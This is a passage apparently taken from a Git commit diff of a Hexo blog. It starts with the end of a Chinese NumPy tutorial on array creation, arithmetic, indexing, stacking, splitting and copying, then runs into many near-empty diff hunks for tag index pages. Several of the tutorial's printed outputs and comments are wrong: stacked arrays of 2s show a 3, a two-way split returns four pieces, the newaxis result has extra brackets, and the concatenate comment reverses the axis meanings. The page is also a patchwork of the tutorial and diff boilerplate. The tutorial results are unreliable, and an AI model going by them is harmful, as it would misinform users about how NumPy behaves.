    print(a.dtype)
    int64

    定义零矩阵

    1
    np.zeros((3, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])

    定义全为一的矩阵

    1
    np.ones((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义未初始化的矩阵

    如果之前未定义过矩阵,内容为十分接近于 0 的随机数,否则值与上一个定义过的矩阵内容一致

    1
    np.empty((3, 4))
    array([[1., 1., 1., 1.],       [1., 1., 1., 1.],       [1., 1., 1., 1.]])

    定义有序的数列,np.arange(初始值,最终值,步长)

    1
    np.arange(10, 20, 2)
    array([10, 12, 14, 16, 18])

    将一个有序数列转换为矩阵

    1
    np.arange(12).reshape(3, 4)
    array([[ 0,  1,  2,  3],       [ 4,  5,  6,  7],       [ 8,  9, 10, 11]])

    生成线段,np.linspace(初始值,最终值,段数)

    1
    np.linspace(1, 10, 5)
    array([ 1.  ,  3.25,  5.5 ,  7.75, 10.  ])

    生成线段,并把它改为矩阵

    1
    np.linspace(1, 10, 6).reshape((2, 3))
    array([[ 1. ,  2.8,  4.6],       [ 6.4,  8.2, 10. ]])

    2.3 numpy 基础运算

    1
    import numpy as np

    创建两个数组

    1
    2
    3
    4
    a = np.array([10, 20, 30, 40])
    b = np.arange(4)
    print(a)
    print(b)
    [10 20 30 40][0 1 2 3]

    数组相减

    1
    a - b
    array([10, 19, 28, 37])

    数组乘方

    1
    a ** b
    array([    1,    20,   900, 64000], dtype=int32)

    对于 a 的每个值,进行正弦运算

    1
    np.sin(a)
    array([-0.54402111,  0.91294525, -0.98803162,  0.74511316])

    对 b 的每个数进行判断

    1
    b < 3
    array([ True,  True,  True, False])
    1
    b == 3
    array([False, False, False,  True])

    定义二维矩阵

    1
    2
    3
    4
    5
    a = np.array([[1, 1],
    [0, 1]])
    b = b.reshape(2, 2)
    print(a)
    print(b)
    [[1 1] [0 1]][[0 1] [2 3]]

    矩阵逐个相乘

    1
    a * b
    array([[0, 1],       [0, 3]])

    矩阵乘法

    1
    np.dot(a, b)
    array([[2, 4],       [2, 3]])
    1
    a.dot(b)
    array([[2, 4],       [2, 3]])

    创建随机生成矩阵,内容为 0 到 1 的随机数

    1
    2
    a = np.random.random((2, 4))
    print(a)
    [[0.8173095  0.68161518 0.69519572 0.38590121] [0.75305129 0.12209991 0.31815067 0.08084771]]

    矩阵求和

    1
    np.sum(a)
    3.854171189705032

    矩阵最小值

    1
    np.min(a)
    0.08084770650268369

    矩阵在第 1 维度(每一行)的求和

    1
    np.sum(a, axis=1)
    array([2.58002161, 1.27414958])

    矩阵在每一列的求和

    1
    np.sum(a, axis=0)
    array([1.57036079, 0.80371509, 1.01334639, 0.46674891])

    2.4 numpy 基础运算 2

    1
    import numpy as np

    定义一个矩阵

    1
    2
    A = np.arange(2, 14).reshape((3, 4))
    print(A)
    [[ 2  3  4  5] [ 6  7  8  9] [10 11 12 13]]

    查询 A 中最小值的索引

    1
    np.argmin(A)
    0

    查询 A 中最大值的索引

    1
    np.argmax(A)
    11

    计算 A 的平均值

    1
    np.mean(A)
    7.5
    1
    A.mean()
    7.5
    1
    np.average(A)
    7.5

    计算 A 的中位数

    1
    np.median(A)
    7.5

    累加 A

    1
    np.cumsum(A)
    array([ 2,  5,  9, 14, 20, 27, 35, 44, 54, 65, 77, 90], dtype=int32)

    累差 A(后一列减前一列)

    1
    np.diff(A)
    array([[1, 1, 1],       [1, 1, 1],       [1, 1, 1]])

    找出 A 中所有非零的下标(行,列)

    1
    np.nonzero(A)
    (array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int64), array([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], dtype=int64))

    对 A 进行逐行排序

    1
    2
    A = np.arange(14, 2, -1).reshape((3, 4))
    print(A)
    [[14 13 12 11] [10  9  8  7] [ 6  5  4  3]]
    1
    np.sort(A)
    array([[11, 12, 13, 14],       [ 7,  8,  9, 10],       [ 3,  4,  5,  6]])

    矩阵的转置

    1
    A.T
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])
    1
    np.transpose(A)
    array([[14, 10,  6],       [13,  9,  5],       [12,  8,  4],       [11,  7,  3]])

    限制 A 的最小值和最大值

    1
    np.clip(A, 5, 9)
    array([[9, 9, 9, 9],       [9, 9, 8, 7],       [6, 5, 5, 5]])

    对于矩阵 A 逐列求平均值

    1
    np.mean(A, axis=0)
    array([10.,  9.,  8.,  7.])

    2.5 numpy 索引

    1
    2
    3
    4
    import numpy as np

    A = np.arange(3, 15)
    print(A)
    [ 3  4  5  6  7  8  9 10 11 12 13 14]

    查找 A 的第 3 个值

    1
    A[3]
    6
    1
    2
    A = A.reshape((3, 4))
    print(A)
    [[ 3  4  5  6] [ 7  8  9 10] [11 12 13 14]]

    查找 A 的第 2 行

    1
    print(A[2])
    [11 12 13 14]

    查找 A 的第 1 行第 1 列

    1
    A[1][1]
    8
    1
    A[1, 1]
    8

    查找 A 的第一列(用冒号代替所有的数)

    1
    A[:, 1]
    array([ 4,  8, 12])

    查找 A 的第一行,第一列到第三列之间的数

    1
    A[1, 1:3]
    array([8, 9])

    用 for 循环输出 A 的所有行

    1
    2
    for row in A:
    print(row)
    [3 4 5 6][ 7  8  9 10][11 12 13 14]

    输出 A 的所有列

    1
    2
    for col in A.T:
    print(col)
    [ 3  7 11][ 4  8 12][ 5  9 13][ 6 10 14]

    将 A 转换为序列

    1
    A.flatten()
    array([ 3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14])

    遍历 A 的各个元素

    1
    2
    for item in A.flat:
    print(item, end=",")
    3,4,5,6,7,8,9,10,11,12,13,14,

    2.6 numpy array 合并

    1
    2
    3
    4
    import numpy as np

    A = np.array([1, 1, 1])
    B = np.array([2, 2, 2])

    A 和 B 向下合并(vertical stack)

    1
    2
    3
    C = np.vstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [[1 1 1] [2 2 3]](3,) (2, 3)

    A 和 B 左右合并(horizontal stack)

    1
    2
    3
    C = np.hstack((A, B))
    print(C)
    print(A.shape, C.shape)
    [1 1 1 2 2 3](3,) (6,)

    将 A 从横向数列转换为竖向数列

    1
    A[:, np.newaxis]
    array([[[1]],       [[1]],       [[1]]])

    将 A 和 B 纵向合并

    1
    2
    3
    A = np.array([1, 1, 1])[:, np.newaxis]
    B = np.array([2, 2, 2])[:, np.newaxis]
    np.vstack((A, B))
    array([[1],       [1],       [1],       [2],       [2],       [2]])
    1
    np.hstack((A, B))
    array([[1, 2],       [1, 2],       [1, 2]])

    设定数组在哪一个维度进行合并

    1
    np.concatenate((A, B, B, A), axis=1) # axis=0 相当于 hstack,axis=1 相当于 vstack
    array([[1, 2, 2, 1],       [1, 2, 2, 1],       [1, 2, 2, 1]])

    2.7 numpy array 分割

    1
    2
    3
    4
    import numpy as np

    A = np.arange(12).reshape((3, 4))
    print(A)
    [[ 0  1  2  3] [ 4  5  6  7] [ 8  9 10 11]]

    等量分割 A,np.split(数组, 个数,维度)

    1
    np.split(A, 2, axis=1)
    [array([[0],        [4],        [8]]), array([[1],        [5],        [9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]
    1
    np.split(A, 3, axis=0)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    1
    np.vsplit(A, 3)
    [array([[0, 1, 2, 3]]), array([[4, 5, 6, 7]]), array([[ 8,  9, 10, 11]])]
    1
    np.hsplit(A, 2)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2,  3],        [ 6,  7],        [10, 11]])]

    不等量分割 A,np.array_split()

    1
    np.array_split(A, 3, axis=1)
    [array([[0, 1],        [4, 5],        [8, 9]]), array([[ 2],        [ 6],        [10]]), array([[ 3],        [ 7],        [11]])]

    2.8 numpy 的 copy & deep copy

    1
    import numpy as np
    1
    2
    A = np.arange(4)
    print(A)
    [0 1 2 3]
    1
    2
    3
    4
    5
    B = A
    C = A
    D = B
    A[0] = 11
    print(A)
    [11  1  2  3]

    判断两个变量是否相同

    1
    B is A
    True
    1
    D is A
    True

    A.copy()

    当 A 的值被改变时,B,C,D 的值也会被改变

    1
    2
    B = A.copy() # deep copy
    B
    array([11,  1,  2,  3])

    此时改变 A 的值,不会改变 B 的值

    1
    2
    A[3] = 44
    A
    array([11,  1,  2, 44])
    1
    B
    array([11,  1,  2,  3])
    ]]>
    diff --git a/tags/3B1B/index.html b/tags/3B1B/index.html index 6dfde25452..0dad55829d 100644 --- a/tags/3B1B/index.html +++ b/tags/3B1B/index.html @@ -43,8 +43,6 @@ - - @@ -560,6 +558,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/6-16-\345\214\227\344\272\254/index.html" "b/tags/6-16-\345\214\227\344\272\254/index.html" index c02b009dd4..7077e2e5aa 100644 --- "a/tags/6-16-\345\214\227\344\272\254/index.html" +++ "b/tags/6-16-\345\214\227\344\272\254/index.html" @@ -43,8 +43,6 @@ - - @@ -565,6 +563,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AE/index.html b/tags/AE/index.html index a4c27334e3..5291633b99 100644 --- a/tags/AE/index.html +++ b/tags/AE/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AI/index.html b/tags/AI/index.html index 5d5e062042..036c3b54d1 100644 --- a/tags/AI/index.html +++ b/tags/AI/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AIGC/index.html b/tags/AIGC/index.html index 7a0556a667..2f645f1555 100644 --- a/tags/AIGC/index.html +++ b/tags/AIGC/index.html @@ -43,8 +43,6 @@ - - @@ -590,6 +588,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/AN/index.html b/tags/AN/index.html index 104e704eaa..a03177422c 100644 --- a/tags/AN/index.html +++ b/tags/AN/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Adobe/index.html b/tags/Adobe/index.html index f34a8b31d6..5a9b680920 100644 --- a/tags/Adobe/index.html +++ b/tags/Adobe/index.html @@ -43,8 +43,6 @@ - - @@ -610,6 +608,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Blender/index.html b/tags/Blender/index.html index d0abfe02bb..7fb10d9ace 100644 --- a/tags/Blender/index.html +++ b/tags/Blender/index.html @@ -43,8 +43,6 @@ - - @@ -640,6 +638,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Blender/page/2/index.html b/tags/Blender/page/2/index.html index d0abfe02bb..7fb10d9ace 100644 --- a/tags/Blender/page/2/index.html +++ b/tags/Blender/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -640,6 +638,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/C4D/index.html b/tags/C4D/index.html index 89abe9ef77..159ad55ef0 100644 --- a/tags/C4D/index.html +++ b/tags/C4D/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CET-6/index.html b/tags/CET-6/index.html index 7d5232af9a..becd8a2512 100644 --- a/tags/CET-6/index.html +++ b/tags/CET-6/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CPP/index.html b/tags/CPP/index.html index 68b1fdbf16..b2c96ae3cb 100644 --- a/tags/CPP/index.html +++ b/tags/CPP/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CSS/index.html b/tags/CSS/index.html index 4f9fd785c8..05c48982ac 100644 --- a/tags/CSS/index.html +++ b/tags/CSS/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/CSharp/index.html b/tags/CSharp/index.html index 566e85aba8..2270c5ecab 100644 --- a/tags/CSharp/index.html +++ b/tags/CSharp/index.html @@ -43,8 +43,6 @@ - - @@ -615,6 +613,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Canvas/index.html b/tags/Canvas/index.html index fe8e3838f6..e5df8cb656 100644 --- a/tags/Canvas/index.html +++ b/tags/Canvas/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/DigitalSreeni/index.html b/tags/DigitalSreeni/index.html index d2666cab10..291d069aed 100644 --- a/tags/DigitalSreeni/index.html +++ b/tags/DigitalSreeni/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/DigitalSreeni/page/2/index.html b/tags/DigitalSreeni/page/2/index.html index d2666cab10..291d069aed 100644 --- a/tags/DigitalSreeni/page/2/index.html +++ b/tags/DigitalSreeni/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Docker/index.html b/tags/Docker/index.html index e773fa2731..f4ed8e18d7 100644 --- a/tags/Docker/index.html +++ b/tags/Docker/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/EJS/index.html b/tags/EJS/index.html index 52c119d635..e4a4e484ca 100644 --- a/tags/EJS/index.html +++ b/tags/EJS/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES101/index.html b/tags/GAMES101/index.html index 386e8a2425..7dec89883f 100644 --- a/tags/GAMES101/index.html +++ b/tags/GAMES101/index.html @@ -43,8 +43,6 @@ - - @@ -605,6 +603,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES104/index.html b/tags/GAMES104/index.html index 5ff5846314..3689afa447 100644 --- a/tags/GAMES104/index.html +++ b/tags/GAMES104/index.html @@ -43,8 +43,6 @@ - - @@ -635,6 +633,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GAMES104/page/2/index.html b/tags/GAMES104/page/2/index.html index 5ff5846314..3689afa447 100644 --- a/tags/GAMES104/page/2/index.html +++ b/tags/GAMES104/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -635,6 +633,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/GenJi/index.html b/tags/GenJi/index.html index cdd20e5584..df9ba3ede3 100644 --- a/tags/GenJi/index.html +++ b/tags/GenJi/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Git/index.html b/tags/Git/index.html index 10700392da..903b98617e 100644 --- a/tags/Git/index.html +++ b/tags/Git/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/HTML/index.html b/tags/HTML/index.html index c2807dcbd5..1102e295e4 100644 --- a/tags/HTML/index.html +++ b/tags/HTML/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Hexo/index.html b/tags/Hexo/index.html index cac1925e35..c22784b69d 100644 --- a/tags/Hexo/index.html +++ b/tags/Hexo/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Hexo/page/2/index.html b/tags/Hexo/page/2/index.html index cac1925e35..c22784b69d 100644 --- a/tags/Hexo/page/2/index.html +++ b/tags/Hexo/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Javascript/index.html b/tags/Javascript/index.html index 04c48856a8..786add8f01 100644 --- a/tags/Javascript/index.html +++ b/tags/Javascript/index.html @@ -43,8 +43,6 @@ - - @@ -685,6 +683,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Javascript/page/2/index.html b/tags/Javascript/page/2/index.html index 04c48856a8..786add8f01 100644 --- a/tags/Javascript/page/2/index.html +++ b/tags/Javascript/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -685,6 +683,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/KurTips/index.html b/tags/KurTips/index.html index 60acd26f08..5431f4b458 100644 --- a/tags/KurTips/index.html +++ b/tags/KurTips/index.html @@ -43,8 +43,6 @@ - - @@ -575,6 +573,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/LR/index.html b/tags/LR/index.html index 7ca323e8a8..5b6ce32f44 100644 --- a/tags/LR/index.html +++ b/tags/LR/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Latex/index.html b/tags/Latex/index.html index 2e6ba641d8..1fd827907e 100644 --- a/tags/Latex/index.html +++ b/tags/Latex/index.html @@ -43,8 +43,6 @@ - - @@ -595,6 +593,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Linux/index.html b/tags/Linux/index.html index 5818dddf73..41fe003fd6 100644 --- a/tags/Linux/index.html +++ b/tags/Linux/index.html @@ -43,8 +43,6 @@ - - @@ -665,6 +663,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/MMOCR/index.html b/tags/MMOCR/index.html index c75352189b..0ac2701b7f 100644 --- a/tags/MMOCR/index.html +++ b/tags/MMOCR/index.html @@ -43,8 +43,6 @@ - - @@ -570,6 +568,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Maya/index.html b/tags/Maya/index.html index ed69ad5f68..6515223548 100644 --- a/tags/Maya/index.html +++ b/tags/Maya/index.html @@ -43,8 +43,6 @@ - - @@ -575,6 +573,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/MindSpore/index.html b/tags/MindSpore/index.html index 3b2690270a..fece69a8a6 100644 --- a/tags/MindSpore/index.html +++ b/tags/MindSpore/index.html @@ -43,8 +43,6 @@ - - @@ -610,6 +608,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/PR/index.html b/tags/PR/index.html index 743462601a..3221d35f48 100644 --- a/tags/PR/index.html +++ b/tags/PR/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/PS/index.html b/tags/PS/index.html index 301f0dd7e7..cfd423b3f9 100644 --- a/tags/PS/index.html +++ b/tags/PS/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Perception/index.html b/tags/Perception/index.html index 16ca3bfcea..a55d01660b 100644 --- a/tags/Perception/index.html +++ b/tags/Perception/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/index.html b/tags/Python/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/index.html +++ b/tags/Python/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/10/index.html b/tags/Python/page/10/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/10/index.html +++ b/tags/Python/page/10/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/11/index.html b/tags/Python/page/11/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/11/index.html +++ b/tags/Python/page/11/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/2/index.html b/tags/Python/page/2/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/2/index.html +++ b/tags/Python/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/3/index.html b/tags/Python/page/3/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/3/index.html +++ b/tags/Python/page/3/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/4/index.html b/tags/Python/page/4/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/4/index.html +++ b/tags/Python/page/4/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/5/index.html b/tags/Python/page/5/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/5/index.html +++ b/tags/Python/page/5/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/6/index.html b/tags/Python/page/6/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/6/index.html +++ b/tags/Python/page/6/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/7/index.html b/tags/Python/page/7/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/7/index.html +++ b/tags/Python/page/7/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/8/index.html b/tags/Python/page/8/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/8/index.html +++ b/tags/Python/page/8/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Python/page/9/index.html b/tags/Python/page/9/index.html index 6c6e951a08..b3df31f09e 100644 --- a/tags/Python/page/9/index.html +++ b/tags/Python/page/9/index.html @@ -43,8 +43,6 @@ - - @@ -1230,6 +1228,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Pytorch/index.html b/tags/Pytorch/index.html index 095a0668f0..36437f1c13 100644 --- a/tags/Pytorch/index.html +++ b/tags/Pytorch/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Pytorch/page/2/index.html b/tags/Pytorch/page/2/index.html index 095a0668f0..36437f1c13 100644 --- a/tags/Pytorch/page/2/index.html +++ b/tags/Pytorch/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -655,6 +653,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/UE4/index.html b/tags/UE4/index.html index 66b7204959..ba213a5b6b 100644 --- a/tags/UE4/index.html +++ b/tags/UE4/index.html @@ -43,8 +43,6 @@ - - @@ -580,6 +578,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unity/index.html b/tags/Unity/index.html index e471bb6f4b..17fb33ab65 100644 --- a/tags/Unity/index.html +++ b/tags/Unity/index.html @@ -43,8 +43,6 @@ - - @@ -690,6 +688,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unity/page/2/index.html b/tags/Unity/page/2/index.html index e471bb6f4b..17fb33ab65 100644 --- a/tags/Unity/page/2/index.html +++ b/tags/Unity/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -690,6 +688,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/UnityPerception/index.html b/tags/UnityPerception/index.html index 1b3c9c55ff..6c09b9763a 100644 --- a/tags/UnityPerception/index.html +++ b/tags/UnityPerception/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Unreal/index.html b/tags/Unreal/index.html index 6786d6cff2..463948ceb5 100644 --- a/tags/Unreal/index.html +++ b/tags/Unreal/index.html @@ -43,8 +43,6 @@ - - @@ -585,6 +583,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Vue/index.html b/tags/Vue/index.html index 7be29b669a..dc416616ff 100644 --- a/tags/Vue/index.html +++ b/tags/Vue/index.html @@ -43,8 +43,6 @@ - - @@ -560,6 +558,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Web/index.html b/tags/Web/index.html index a54c436528..f10f7504bd 100644 --- a/tags/Web/index.html +++ b/tags/Web/index.html @@ -43,8 +43,6 @@ - - @@ -555,6 +553,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/Word/index.html b/tags/Word/index.html index ed029e1971..66bb379d24 100644 --- a/tags/Word/index.html +++ b/tags/Word/index.html @@ -43,8 +43,6 @@ - - @@ -570,6 +568,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/X-\344\272\206/index.html" "b/tags/X-\344\272\206/index.html" index e71d84d4c2..ff1cf00bdd 100644 --- "a/tags/X-\344\272\206/index.html" +++ "b/tags/X-\344\272\206/index.html" @@ -43,8 +43,6 @@ - - @@ -885,6 +883,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/X-\344\272\206/page/2/index.html" "b/tags/X-\344\272\206/page/2/index.html" index e71d84d4c2..ff1cf00bdd 100644 --- "a/tags/X-\344\272\206/page/2/index.html" +++ "b/tags/X-\344\272\206/page/2/index.html" @@ -43,8 +43,6 @@ - - @@ -885,6 +883,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/X-\344\272\206/page/3/index.html" "b/tags/X-\344\272\206/page/3/index.html" index e71d84d4c2..ff1cf00bdd 100644 --- "a/tags/X-\344\272\206/page/3/index.html" +++ "b/tags/X-\344\272\206/page/3/index.html" @@ -43,8 +43,6 @@ - - @@ -885,6 +883,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/tags/X-\344\272\206/page/4/index.html" "b/tags/X-\344\272\206/page/4/index.html" index e71d84d4c2..ff1cf00bdd 100644 --- "a/tags/X-\344\272\206/page/4/index.html" +++ "b/tags/X-\344\272\206/page/4/index.html" @@ -43,8 +43,6 @@ - - @@ -885,6 +883,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/YOLO/index.html b/tags/YOLO/index.html index 9783575505..28c3efe5e6 100644 --- a/tags/YOLO/index.html +++ b/tags/YOLO/index.html @@ -43,8 +43,6 @@ - - @@ -560,6 +558,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/YouTube/index.html b/tags/YouTube/index.html index 5acac3661e..0122a1d50c 100644 --- a/tags/YouTube/index.html +++ b/tags/YouTube/index.html @@ -43,8 +43,6 @@ - - @@ -575,6 +573,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/tags/index.html b/tags/index.html index 73ba997d9f..1133d7b18c 100644 --- a/tags/index.html +++ b/tags/index.html @@ -43,8 +43,6 @@ - - @@ -338,8 +336,6 @@

    共有 104 个标签

    - - @@ -350,12 +346,14 @@

    共有 104 个标签

    - + + + @@ -574,8 +572,6 @@

    共有 104 个标签

    - - @@ -590,6 +586,8 @@

    共有 104 个标签

    + + @@ -726,8 +724,6 @@

    共有 104 个标签

    - - @@ -736,8 +732,6 @@

    共有 104 个标签

    - - @@ -764,8 +758,6 @@

    共有 104 个标签

    - - @@ -782,8 +774,6 @@

    共有 104 个标签

    - - @@ -818,6 +808,8 @@

    共有 104 个标签

    + + @@ -832,6 +824,8 @@

    共有 104 个标签

    + + @@ -896,6 +890,8 @@

    共有 104 个标签

    + + @@ -916,6 +912,8 @@

    共有 104 个标签

    + + @@ -1020,10 +1018,10 @@

    共有 104 个标签

    - - + + @@ -1116,13 +1114,13 @@

    共有 104 个标签

    - + - + @@ -1148,6 +1146,8 @@

    共有 104 个标签

    + + @@ -1166,24 +1166,24 @@

    共有 104 个标签

    - + - - - + + + @@ -1300,8 +1300,6 @@

    共有 104 个标签

